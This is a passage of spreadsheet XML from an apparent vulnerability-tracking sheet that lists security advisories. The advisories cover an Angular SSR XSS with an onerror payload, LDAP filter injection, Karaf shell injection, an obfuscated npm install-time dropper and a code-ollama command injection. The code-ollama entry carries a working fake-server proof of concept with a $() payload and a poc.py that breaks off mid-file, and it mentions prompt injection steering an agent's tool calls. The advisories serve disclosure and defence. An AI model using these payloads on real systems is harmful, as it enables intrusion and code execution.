      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88058</t>
        </is>
      </c>
      <c r="D202" s="5" t="inlineStr"/>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/platform-server</t>
        </is>
      </c>
      <c r="M202" s="5" t="inlineStr">
        <is>
          <t>20.3.30, 21.2.22, 22.1.4</t>
        </is>
      </c>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr"/>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>### Summary
An XSS vulnerability exists in `@angular/platform-server` during server-side rendering (SSR) HTML serialization of `ProcessingInstruction` DOM nodes (`&lt;?target data?&gt;`, `nodeType === 7`) when nested inside fallback raw-content elements (`&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, `&lt;noframes&gt;`). While processing instruction data escaped `&gt;` to `&amp;gt;`, it did not check for or escape matching closing tags of ancestor fallback elements (e.g., `&lt;/noscript&gt;`). When rendered in a browser with scripting enabled, an unescaped closing tag sequence in a processing instruction prematurely closes the fallback raw-content tag and causes subsequent sibling elements to execute as live HTML.
### Technical Description
In HTML5 parsing, fallback raw-content elements (`&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, `&lt;noframes&gt;`) place the browser's HTML tokenizer into `RAWTEXT` mode. In `RAWTEXT` mode, processing instruction tokens (`&lt;?...?&gt;`) are treated as literal raw text rather than bogus comments, and the parser ignores `&gt;` or `?&gt;`. The only token sequence that terminates the container is an end tag matching the container tag name (`&lt;/noscript`, `&lt;/iframe`, etc.).
During server-side HTML serialization, processing instruction nodes previously only replaced `&gt;` with `&amp;gt;` (preventing bogus comment breakouts in normal HTML data states) but left `&lt;` untouched. Crucially, processing instruction serialization never inspected ancestor fallback raw-content tags. As a result, if a `ProcessingInstruction` node inside `&lt;noscript&gt;` contained `&lt;/noscript ` in its data payload, it was emitted unescaped as `&lt;?x &lt;/noscript ?&gt;`.
### Impact &amp; Reachability
* **Reachability**: Processing instruction nodes cannot be authored directly through standard Angular template syntax (which parses `&lt;?...&gt;` into comment nodes in DOM position). Reaching this vulnerability requires application or library code calling `inject(DOCUMENT).createProcessingInstruction(target, data)` or `Renderer2` DOM insertion methods with untrusted user input passed to `data` inside a fallback raw-content container.
* **Impact**: In applications that programmatically construct processing instruction nodes inside fallback elements during server-side rendering, an attacker controlling the processing instruction data can break out of the container and execute arbitrary JavaScript in victims' browsers.
### Proof of Concept (Minimal Reproduction)
```ts
import { Component, ElementRef, Renderer2, inject, DOCUMENT, AfterViewInit } from '@angular/core';
@Component({
  selector: 'app-root',
  standalone: true,
  template: `&lt;noscript id="host"&gt;&lt;/noscript&gt;`
})
export class AppComponent implements AfterViewInit {
  private r = inject(Renderer2);
  private el = inject(ElementRef);
  private doc = inject(DOCUMENT);
  ngAfterViewInit() {
    const host = this.el.nativeElement.querySelector('#host');
    // Attacker-controlled input passed as Processing Instruction data
    const pi = this.doc.createProcessingInstruction('x', '&lt;/noscript ');
    this.r.appendChild(host, pi);
    // Sibling markup that should remain inert inside &lt;noscript&gt;
    const img = this.r.createElement('img');
    this.r.setAttribute(img, 'src', 'x');
    this.r.setAttribute(img, 'onerror', 'alert("SSR_PI_XSS")');
    this.r.appendChild(host, img);
  }
}
```
**Vulnerable SSR Output**:
```html
&lt;noscript&gt;&lt;?x &lt;/noscript ?&gt;&lt;img src="x" onerror="alert('SSR_PI_XSS')"&gt;&lt;/noscript&gt;
```
### Workarounds
* Avoid passing untrusted user input into `document.createProcessingInstruction(target, data)` when the node is inserted into `&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, or `&lt;noframes&gt;` during server-side rendering.
* Manually sanitize or replace `&lt;` with `&amp;lt;` in any untrusted data passed to processing instruction nodes on the server.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88058</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88932</t>
        </is>
      </c>
      <c r="D203" s="5" t="inlineStr"/>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M203" s="5" t="inlineStr">
        <is>
          <t>2.4.0</t>
        </is>
      </c>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr"/>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>### Impact
Multer's `diskStorage` can leave complete, orphaned files on disk when a multipart upload is aborted in the brief window before the storage engine assigns the file path. This is an incomplete fix of CVE-2026-5038: the earlier cleanup removes only in-flight uploads that already have a path, so an upload aborted inside that window is written to disk with nothing left to remove it, and the application is not given a handle to clean it up. An unauthenticated attacker sending aborted requests to any route backed by disk storage can accumulate orphaned files until the upload directory or the shared system temporary directory is exhausted. An asynchronous `destination` or `filename` widens the window.
### Patches
Users should upgrade to `2.4.0` or higher.
### Workarounds
None.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88932</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9029</t>
        </is>
      </c>
      <c r="D204" s="5" t="inlineStr"/>
      <c r="E204" s="5" t="inlineStr"/>
      <c r="F204" s="5" t="inlineStr"/>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr"/>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>Grafana geomap panel's XYZ tile layer has a sanitize-then-interpolate ordering bug in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9029</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90979</t>
        </is>
      </c>
      <c r="D205" s="5" t="inlineStr"/>
      <c r="E205" s="5" t="inlineStr"/>
      <c r="F205" s="5" t="inlineStr"/>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr">
        <is>
          <t>sap, gin</t>
        </is>
      </c>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>LDAPCache and LDAPBackingEngine build LDAP search filters for user lookup and role lookup by textually substituting the placeholders %u, %dn, and %fqdn (drawn from the login name, the resolved user DN, and its fully qualified namespace form) into administrator-configured filter templates (userFilter, roleFilter). Before the fix, the only sanitization applied to the substituted value was double backslashed:
filter = filter.replaceAll(Pattern.quote("%u"), Matcher.quoteReplacement(user));
filter = filter.replace("\\", "\\\\");
This does not escape the other characters RFC 4515 requires escaping in an LDAP search filter: *, (, ), and NUL. A login name containing any of these can change the structure of the resulting filter rather than being matched as a literal value (e.g. a crafted username can turn an equality match into a wildcard match, or close/reopen filter clauses), widening what the search returns and potentially causing a login or role lookup to match an LDAP entry other than the intended one, over-granting roles, and depending on deployment-specific filter templates, potentially affecting which account a login resolved to.
It's not exploitable through every entry points: LDAPLoginModule and LDAPPubkeyLoginModule both called Util.doRFC2254Encoding() (correct RFC 4515 escaping) on the login name before handing it to LDAPCache, which masked the missing escaping in LDAPCache for those two call paths. Using LDAPCache directly (bypassing the login modules) does not reproduce through the normal LDAPLoginModule/LDAPPubkeyLoginModule authentication flow for this reason. It does reproduce through two other call paths that reach LDAPCache/LDAPBackingEngine without any prior escaping:
  *  GSSAPILdapLoginModule passes the NameCallback name straight through, unescaped.
  *  LDAPBackingEngine (listRoles) passes principal.getName() straight through, unescaped.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90979</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91006</t>
        </is>
      </c>
      <c r="D206" s="5" t="inlineStr"/>
      <c r="E206" s="5" t="inlineStr"/>
      <c r="F206" s="5" t="inlineStr"/>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>Apache Karaf's instance-management service (InstanceServiceImpl) builds the command line used to launch a child Karaf JVM by string concatenation, then executes it through /bin/sh (Unix) or cscript (Windows). The caller-supplied javaOpts value is spliced into that string unquoted. A javaOpts value containing shell metacharacters (;, |, `, $(...)) is interpreted by the shell instead of being passed to the JVM as an option, giving arbitrary OS command execution as the Karaf process user.
Reachable via the shell commands instance:create, instance:start, instance:restart, instance:change-opts, and the equivalent InstanceMBean JMX operations (createInstance, startInstance, changeJavaOpts, cloneInstance).
Mitigation   *  Set karaf.secured.command.compulsory.roles=admin in etc/system.properties to close the fail-open gap for all unconfigured command scopes.
  *  Restrict which principals can reach instance:* commands and InstancesMBean via etc/users.properties role assignments.
  *  Treat javaOpts passed to instance:create/instance:start/instance:change-opts/InstancesMBean as untrusted input only from fully-trusted operators.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91006</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9162</t>
        </is>
      </c>
      <c r="D207" s="5" t="inlineStr"/>
      <c r="E207" s="5" t="inlineStr"/>
      <c r="F207" s="5" t="inlineStr"/>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M207" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr"/>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't invalidate cached authentication state for active WebSocket connections during global session revocation in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9162</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>GHSA-2gr6-gxvx-3594</t>
        </is>
      </c>
      <c r="D208" s="5" t="inlineStr"/>
      <c r="E208" s="5" t="inlineStr"/>
      <c r="F208" s="5" t="inlineStr"/>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr">
        <is>
          <t>npm:nebulajs-api</t>
        </is>
      </c>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr"/>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (07debd960454b52639fee783e21c0c303702d8dce6de5e3320393f1b0abc7077)
package.json declares scripts.preinstall = 'node preinstall.cjs'. preinstall.cjs is a single ~232KB opaque Function(...) invocation containing a custom PRNG-based string decoder (VnDKxn using constants 0x9e3779b9, 0x243f6a88, 0x6a09e667, 0x7f4a7c15) and a ciphertext table (KWlywdS) that is XOR-reconstructed at runtime via Tr8b5jD into executable code. The visible source contains no readable build logic; the entire install-time behavior is materialized from the decoded blob. This is the canonical npm install-time RCE dropper shape: an author-controlled preinstall hook whose destinations, commands, and payload are all hidden behind runtime decoding, executing on the installer's machine at `npm install` time before the user has run any package code. The shipped main module (nebula.js) is a thin AI-client wrapper hardcoding baseUrl https://api.nebulaai.dev/v2, disproportionately small compared to the obfuscated install script, and functions as a cover surface unrelated to the preinstall payload.
## Source: ghsa-malware (8e5df52f8d9581ab8db82a19ed61221cea9967ba53897bb4278838d6ef50063c)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08" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17220</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>GHSA-456v-xq2p-r4cj</t>
        </is>
      </c>
      <c r="D209" s="5" t="inlineStr"/>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr">
        <is>
          <t>npm:code-ollama</t>
        </is>
      </c>
      <c r="M209" s="5" t="inlineStr">
        <is>
          <t>0.36.1</t>
        </is>
      </c>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr"/>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>## `grep_search` Command Injection via Unescaped `$()` Shell Substitution (CWE-78)
### Summary
The `grep_search` tool in `code-ollama` constructs a shell command string by interpolating attacker-controlled `pattern` and `path` arguments, then executes it via `child_process.exec()`. The sanitization only escapes backslashes and double-quote characters, leaving `$()` command substitution and backtick expansion fully intact. A malicious or compromised Ollama server can therefore inject and execute arbitrary OS commands with the privileges of the local user running `code-ollama`. Because `grep_search` is classified as a read-only tool, it auto-executes in Plan mode without any user approval prompt, making this a no-interaction-required exploitation path. Severity is **High (CVSS 7.8)**.
### Details
**Vulnerable sink — `src/utils/tools/filesystem/grep.ts:58-66`**
```ts
const escapedPattern = searchPattern
  .replace(/\\/g, '\\\\')
  .replace(/"/g, '\\"');
const escapedDirPath = dirPath.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
const { stdout } = await execShell(
  `rg --line-number --no-heading --smart-case "${escapedPattern}" "${escapedDirPath}"`,
);
```
Only `\` and `"` are neutralized. The shell metacharacter sequence `$()` (and backtick-style `` ` `` substitution) is passed through unmodified. The resulting string is passed to `execShell()` (`src/utils/tools/shell.ts:46-49`), which calls `exec` — the promisified `child_process.exec` defined at `src/utils/node.ts:1-4` — causing `/bin/sh` to interpret the entire string and expand any embedded command substitution.
**Full data-flow path (source → sink)**
| Step | Location | Action |
|------|----------|--------|
| 1 | `src/utils/ollama.ts:102-103` | External Ollama chat stream delivers `chunk.message.tool_calls` to the CLI |
| 2 | `src/cli.ts:147-148` | Each `toolCall` is forwarded to `tools.executeToolCall()` |
| 3 | `src/utils/tools/dispatcher.ts:300-306` | Dispatcher normalizes the call and routes it |
| 4 | `src/utils/tools/dispatcher.ts:392-393` | `stringArgs.pattern` and `stringArgs.path` are passed verbatim to `grepSearch()` |
| 5 | `src/utils/tools/filesystem/grep.ts:58-63` | Incomplete sanitization: only `\` and `"` are escaped (**root cause**) |
| 6 | `src/utils/tools/filesystem/grep.ts:65` | Shell command string assembled and handed to `execShell()` (**sink**) |
| 7 | `src/utils/tools/shell.ts:46-49` → `src/utils/node.ts:1-4` | `exec()` (`child_process.exec`) executes the string via `/bin/sh` |
**Approval-bypass amplifier**
`grep_search` is listed in `READ_TOOL_NAMES` at `src/constants/tool.ts:14-20` and is exposed in Plan mode at `src/utils/tools/definitions.ts:225-228`. Read-only tools execute automatically without presenting an approval prompt to the user, so exploitation requires zero user interaction beyond the initial `code-ollama run` invocation.
### PoC
**Prerequisites**
- `code-ollama` v0.36.0 installed (e.g., `npm install --global code-ollama@0.36.0` or built from source via the Dockerfile below).
- `ripgrep` (`rg`) available in `PATH` (the vulnerable code path requires it).
- Python 3 available to run the fake Ollama server.
**Step 1 — Build the self-contained Docker image (recommended)**
```sh
# From the report root directory (where vuln-001/ lives)
docker build -t vuln001-code-ollama -f vuln-001/Dockerfile .
docker run --rm vuln001-code-ollama
```
The container automatically runs `poc.py` as `CMD`. Successful exploitation prints:
```
[+] EXPLOITATION CONFIRMED
[+] Marker file : /tmp/poc-evidence
[+] Contents    : 'uid=0(root) gid=0(root) groups=0(root)'
```
**Step 2 — Manual reproduction (bare-metal)**
```sh
# Terminal 1 — start the malicious Ollama server
cat &gt; /tmp/fake-ollama.py &lt;&lt;'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
import json, sys, threading
_req = 0
_lock = threading.Lock()
class H(BaseHTTPRequestHandler):
    def log_message(self, *a): pass
    def do_GET(self):
        self.send_response(200); self.end_headers()
        self.wfile.write(b"Ollama is running")
    def do_POST(self):
        global _req
        l = int(self.headers.get("Content-Length", 0))
        self.rfile.read(l)
        with _lock:
            _req += 1; n = _req
        self.send_response(200)
        self.send_header("Content-Type", "application/x-ndjson")
        self.end_headers()
        if n == 1:
            chunk = {"model":"fake","message":{"role":"assistant","content":"",
                "tool_calls":[{"function":{"name":"grep_search",
                    "arguments":{"pattern":"$(id&gt;/tmp/poc-evidence)","path":"/tmp"}}}]},
                "done":True,"done_reason":"stop"}
        else:
            chunk = {"model":"fake","message":{"role":"assistant","content":"Done."},
                "done":True,"done_reason":"stop"}
        self.wfile.write((json.dumps(chunk)+"\n").encode())
        self.wfile.flush()
HTTPServer(("127.0.0.1", 11434), H).serve_forever()
PY
python3 /tmp/fake-ollama.py &amp;
# Terminal 2 — run code-ollama against the fake server
rm -f /tmp/poc-evidence
OLLAMA_HOST=http://127.0.0.1:11434 code-ollama run --trust fake "search the code"
cat /tmp/poc-evidence   # expected: uid=... gid=... groups=...
```
**Explanation of the payload**
The `pattern` argument value `$(id&gt;/tmp/poc-evidence)` survives the sanitization in `grep.ts:58-63` because only `\` and `"` are stripped. When the resulting shell string
```
rg --line-number --no-heading --smart-case "$(id&gt;/tmp/poc-evidence)" "/tmp"
```
is executed by `/bin/sh` via `child_process.exec`, the shell expands `$()` first, running `id` and writing its output to `/tmp/poc-evidence` before `rg` ever starts.
**Remediation**
Replace the shell-string construction with an argument-vector call to avoid the shell entirely:
```diff
-import { execShell } from '../shell';
+import { execFile } from '../../node';
+
+const RG_EXEC_OPTIONS = { timeout: 30_000, maxBuffer: 1024 * 1024 };
-      const escapedPattern = searchPattern
-        .replace(/\\/g, '\\\\')
-        .replace(/"/g, '\\"');
-      const escapedDirPath = dirPath
-        .replace(/\\/g, '\\\\')
-        .replace(/"/g, '\\"');
-
-      const { stdout } = await execShell(
-        `rg --line-number --no-heading --smart-case "${escapedPattern}" "${escapedDirPath}"`,
-      );
+      const { stdout } = await execFile(
+        'rg',
+        ['--line-number', '--no-heading', '--smart-case', '--', searchPattern, dirPath],
+        RG_EXEC_OPTIONS,
+      );
```
### Impact
This is an **OS Command Injection** vulnerability (CWE-78). Any party that controls the Ollama server response — including a rogue model backend, a prompt-injection payload that manipulates the model into issuing a crafted `grep_search` tool call, or a network adversary performing a man-in-the-middle attack on an unencrypted `OLLAMA_HOST` connection — can execute arbitrary commands as the OS user running `code-ollama`.
Impact scope:
- **Confidentiality (High)** — attacker can read any file accessible to the user, exfiltrate source code, secrets, SSH keys, etc.
- **Integrity (High)** — attacker can modify or delete files, plant backdoors, alter repository history.
- **Availability (High)** — attacker can terminate processes, corrupt data, or consume system resources.
The approval-bypass via `READ_TOOL_NAMES` / Plan-mode auto-execution means the attack completes silently with no user interaction after `code-ollama run` is invoked. Developers, CI pipelines, and IDE-integrated users who run `code-ollama` in trusted directories are all at risk.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# VULN-001: grep_search Command Injection — CWE-78
# Target: ai-action/code-ollama v0.36.0
# Proof-of-concept Docker image: builds the repo and runs poc.py
#
# Build (from project root):
#   docker build -t vuln001-code-ollama -f vuln-001/Dockerfile .
# Run:
#   docker run --rm vuln001-code-ollama
FROM node:24-slim
# ripgrep  — required by grepSearch() in the vulnerable code path
# python3  — runs poc.py orchestration script
RUN apt-get update &amp;&amp; apt-get install -y \
    ripgrep \
    python3 \
    --no-install-recommends \
 &amp;&amp; rm -rf /var/lib/apt/lists/*
# ── Install Node dependencies ──────────────────────────────────────────────────
WORKDIR /app
COPY repo/package.json repo/package-lock.json ./
# Install ALL deps (devDeps needed for vite build / tsx fallback)
RUN npm ci
# ── Copy source and build ──────────────────────────────────────────────────────
COPY repo/ ./
# Produces /app/dist/cli.js — the bundled CLI entrypoint
RUN npm run build
# ── Runtime setup ─────────────────────────────────────────────────────────────
# code-ollama writes config to ~/.code-ollama; pre-create to avoid mkdir race
RUN mkdir -p /root/.code-ollama /workspace
COPY vuln-001/poc.py /poc.py
WORKDIR /workspace
CMD ["python3", "/poc.py"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
Proof of Concept: VULN-001 — grep_search Command Injection (CWE-78)
Repository : ai-action/code-ollama v0.36.0
Sink       : src/utils/tools/filesystem/grep.ts:65
             execShell(`rg ... "${escapedPattern}" "${escapedDirPath}"`)
Attack path: malicious Ollama server -&gt; tool_call.arguments.pattern
             -&gt; grepSearch() -&gt; execShell() -&gt; child_process.exec()
Only `\\` and `"` are escaped; `$()` command substitution is NOT neutralized.
This PoC demonstrates that a rogue Ollama server can inject arbitrary shell
commands that execute as the local user running code-ollama.
Usage (inside Docker, called automatically by CMD):
    python3 /poc.py
Expected outcome:
    /tmp/poc-evidence is created with content matching INJECTED_CMD output.
"""
import json
import os
import subprocess
import sys
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
FAKE_SERVER_HOST = "127.0.0.1"
FAKE_SERVER_PORT = 11434
# The marker file written by the injected command — used as exploitation proof
MARKER_FILE = "/tmp/poc-evidence"
# Payload: $() command substitution that is NOT escaped by code-ollama's
# sanitization (only \\ and " are escaped, leaving $() intact).
# Writes output of `id` to MARKER_FILE to capture the running UID/GID.
INJECTED_CMD = f"$(id&gt;{MARKER_FILE})"
# Path argument for grep_search (must be a valid non-empty string)
TARGET_PATH = "/workspace"
# Tracks how many POST requests the fake server has received
_request_count = 0
_request_lock = threading.Lock()
# ---------------------------------------------------------------------------
# Fake Ollama HTTP server
# ---------------------------------------------------------------------------
class FakeOllamaHandler(BaseHTTPRequestHandler):
    """Minimal Ollama-compatible HTTP server for the PoC.
    First POST /api/chat  -&gt; returns a grep_search tool_call carrying the
                             injected pattern.
    Subsequent POSTs      -&gt; return a plain done response to terminate the
                             code-ollama tool-loop.
    """
    def log_message(self, fmt, *args):  # suppress default request logging
        pass
    # ------------------------------------------------------------------
    # GET — health-check (code-ollama / ollama-npm may call GET /)
    # ------------------------------------------------------------------
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"Ollama is running")
    # ------------------------------------------------------------------
    # POST — chat streaming endpoint
    # ------------------------------------------------------------------
    def do_POST(self):
        global _request_count
        # Consume request body to avoid broken-pipe on the client side
        content_length = int(self.headers.get("Content-Length", 0))
        _ = self.rfile.read(content_length)
        with _request_lock:
            _request_count += 1
            current_request = _request_count
        self.send_response(200)
        self.send_header("Content-Type", "application/x-ndjson")
        self.end_headers()
        if current_request == 1:
            # ---------------------------------------------------------------
